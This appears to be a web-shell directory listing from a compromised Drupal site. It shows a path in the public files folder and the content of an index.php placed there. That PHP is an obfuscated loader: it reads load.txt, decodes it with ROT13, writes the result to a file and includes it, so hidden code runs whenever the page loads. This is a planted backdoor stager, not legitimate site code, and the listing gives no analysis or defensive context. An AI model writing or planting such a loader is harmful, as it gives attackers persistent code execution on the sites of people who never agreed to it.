DIR: /home/depancom/www/drupal/sites/default/files/302170/817643/ |
Current File : /home/depancom/www/drupal/sites/default/files/302170/817643/index.php |
<?php $kk = file_get_contents("load.txt"); $kk = str_rot13($kk); file_put_contents('load', $kk); include "load"; |